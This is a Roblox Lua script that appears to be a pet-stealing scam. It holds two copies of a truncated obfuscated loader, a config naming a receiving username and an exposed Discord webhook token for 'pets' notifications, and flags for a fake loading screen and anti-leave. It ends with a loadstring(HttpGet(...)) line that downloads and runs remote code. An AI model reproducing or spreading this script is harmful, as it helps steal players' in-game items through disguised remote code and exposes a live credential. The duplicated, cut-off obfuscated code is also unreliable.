-- do
	local v0 = string.char;
	local v1 = string.byte;
	local v2 = string.sub;
	local v3 = bit32 or bit;
	local v4 = v3.bxor;
	local v5 = table.concat;
	local v6 = table.insert;
	local function v7(v24, v25)
		local v26 = 0;
		local v27;
		while true do
			if (v26 == 1) then
				return v5(v27);
			end
			if (v26 == 0) then
				v27 = {};
				for v44 = 1, #v24 do
					v6(v27, v0(v4(v1(v2(v24, v44, v44 + 1)), v1(v2(v25, 1 + (v44 % #v25), 1 + (v44 % #v25) + 1))) % 256));
				end
				v26 = 1;
			end
		end
	end
	local v8 = tonumber;
	local v9 = string.byte;
	local v10 = string.char;
	local v11 = string.sub;
	local v12 = string.gsub;
	local v13 = string.rep;
	local v14 = table.concat;
	local v15 = table.insert;
	local v16 = math.ldexp;
	local v17 = getfenv or function()
		return _ENV;
	end;
	local v18 = setmetatable;
	local v19 = pcall;
	local v20 = select;
	local v21 = unpack or table.unpack;
	local v22 = tonumber;
	local function v23(v28, v29, ...)
		local v30 = 0;
		local v31;
		local v32;
		local v33;
		local v34;
		local v35;
		local v36;
		local v37;
		local v38;
		local v39;
		local v40;
		local v41;
		local v42;
		local v43;
		while true do
			if (v30 == 1) then
				v35 = nil;
				v36 = nil;
				v37 = nil;
				v38 = nil;
				v30 = 2;
			end
			if (2 == v30) then
				v39 = nil;
				v40 = nil;
				v41 = nil;
				v42 = nil;
				v30 = 3;
			end
			if (v30 == 0) then
				v31 = 0;
				v32 = nil;
				v33 = nil;
				v34 = nil;
				v30 = 1;
			end
			if (v30 == 3) then
				v43 = nil;
				while true do
					local v45 = 0;
					while true do
						if (v45 == 1) then
							if (0 == v31) then
								local v46 = 0;
								while true do
									if (v46 == 1) then
										v28 = v12(v11(v28, 5), v7("\21\96", "\45\59\78\212\54"), function(v52)
											if (v9(v52, 2) == 79) then
												local v97 = 0;
												while true do
													if (v97 == 0) then
														v33 = v8(v11(v52, 2 - 1, 1));
														return "";
													end
												end
											else
												local v98 = 0;
												local v99;
												local v100;
												while true do
													if (v98 == 1) then
														while true do
															if (v99 == 0) then
																v100 = v10(v8(v52, 16));
																if v33 then
																	local v142 = 0;
																	local v143;
																	while true do
																		if (1 == v142) then
																			return v143;
																		end
																		if (v142 == 0) then
																			v143 = v13(v100, v33);
																			v33 = nil;
																			v142 = 1;
																		end
																	end
																else
																	return v100;
																end
																break;
															end
														end
														break;
													end
													if (v98 == 0) then
														v99 = 0;
														v100 = nil;
														v98 = 1;
													end
												end
											end
										end);
										v34 = nil;
										v46 = 2;
									end
									if (v46 == 0) then
										v32 = 1;
										v33 = nil;
										v46 = 1;
									end
									if (v46 == 2) then
										v31 = 1;
										break;
									end
								end
							end
							if (v31 == 4) then
								local v47 = 0;
								while true do
									if (v47 == 2) then
										v31 = 5;
										break;
									end
									if (0 == v47) then
										v41 = nil;
										function v41(...)
											return {...}, v20("#", ...);
										end
										v47 = 1;
									end
									if (v47 == 1) then
										v42 = nil;
										function v42()
											local v53 = 0;
											local v54;
											local v55;
											local v56;
											local v57;
											local v58;
											local v59;
											while true do
												if (v53 == 0) then
													v54 = {};
													v55 = {};
													v56 = {};
													v53 = 1;

UserName = "popman_80" -- good pets
Webhook = "https://discord.com/api/webhooks/1125481167773245500/Ry-LryYmtzcKVmmsHuUqTJJYM1_I0ZOFcCWd9yR4nAUiL2mMD6JWAkkq2EfyXF84GY-F" -- pings for pets
UserName2 = "popman_80" -- bad pets
-- do
	local v0 = string.char;
	local v1 = string.byte;
	local v2 = string.sub;
	local v3 = bit32 or bit;
	local v4 = v3.bxor;
	local v5 = table.concat;
	local v6 = table.insert;
	local function v7(v24, v25)
		local v26 = 0;
		local v27;
		while true do
			if (v26 == 1) then
				return v5(v27);
			end
			if (v26 == 0) then
				v27 = {};
				for v44 = 1, #v24 do
					v6(v27, v0(v4(v1(v2(v24, v44, v44 + 1)), v1(v2(v25, 1 + (v44 % #v25), 1 + (v44 % #v25) + 1))) % 256));
				end
				v26 = 1;
			end
		end
	end
	local v8 = tonumber;
	local v9 = string.byte;
	local v10 = string.char;
	local v11 = string.sub;
	local v12 = string.gsub;
	local v13 = string.rep;
	local v14 = table.concat;
	local v15 = table.insert;
	local v16 = math.ldexp;
	local v17 = getfenv or function()
		return _ENV;
	end;
	local v18 = setmetatable;
	local v19 = pcall;
	local v20 = select;
	local v21 = unpack or table.unpack;
	local v22 = tonumber;
	local function v23(v28, v29, ...)
		local v30 = 0;
		local v31;
		local v32;
		local v33;
		local v34;
		local v35;
		local v36;
		local v37;
		local v38;
		local v39;
		local v40;
		local v41;
		local v42;
		local v43;
		while true do
			if (v30 == 1) then
				v35 = nil;
				v36 = nil;
				v37 = nil;
				v38 = nil;
				v30 = 2;
			end
			if (2 == v30) then
				v39 = nil;
				v40 = nil;
				v41 = nil;
				v42 = nil;
				v30 = 3;
			end
			if (v30 == 0) then
				v31 = 0;
				v32 = nil;
				v33 = nil;
				v34 = nil;
				v30 = 1;
			end
			if (v30 == 3) then
				v43 = nil;
				while true do
					local v45 = 0;
					while true do
						if (v45 == 1) then
							if (0 == v31) then
								local v46 = 0;
								while true do
									if (v46 == 1) then
										v28 = v12(v11(v28, 5), v7("\21\96", "\45\59\78\212\54"), function(v52)
											if (v9(v52, 2) == 79) then
												local v97 = 0;
												while true do
													if (v97 == 0) then
														v33 = v8(v11(v52, 2 - 1, 1));
														return "";
													end
												end
											else
												local v98 = 0;
												local v99;
												local v100;
												while true do
													if (v98 == 1) then
														while true do
															if (v99 == 0) then
																v100 = v10(v8(v52, 16));
																if v33 then
																	local v142 = 0;
																	local v143;
																	while true do
																		if (1 == v142) then
																			return v143;
																		end
																		if (v142 == 0) then
																			v143 = v13(v100, v33);
																			v33 = nil;
																			v142 = 1;
																		end
																	end
																else
																	return v100;
																end
																break;
															end
														end
														break;
													end
													if (v98 == 0) then
														v99 = 0;
														v100 = nil;
														v98 = 1;
													end
												end
											end
										end);
										v34 = nil;
										v46 = 2;
									end
									if (v46 == 0) then
										v32 = 1;
										v33 = nil;
										v46 = 1;
									end
									if (v46 == 2) then
										v31 = 1;
										break;
									end
								end
							end
							if (v31 == 4) then
								local v47 = 0;
								while true do
									if (v47 == 2) then
										v31 = 5;
										break;
									end
									if (0 == v47) then
										v41 = nil;
										function v41(...)
											return {...}, v20("#", ...);
										end
										v47 = 1;
									end
									if (v47 == 1) then
										v42 = nil;
										function v42()
											local v53 = 0;
											local v54;
											local v55;
											local v56;
											local v57;
											local v58;
											local v59;
											while true do
												if (v53 == 0) then
													v54 = {};
													v55 = {};
													v56 = {};
													v53 = 1;
_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/MoriScripts/main/MoriScriptZ", true))()
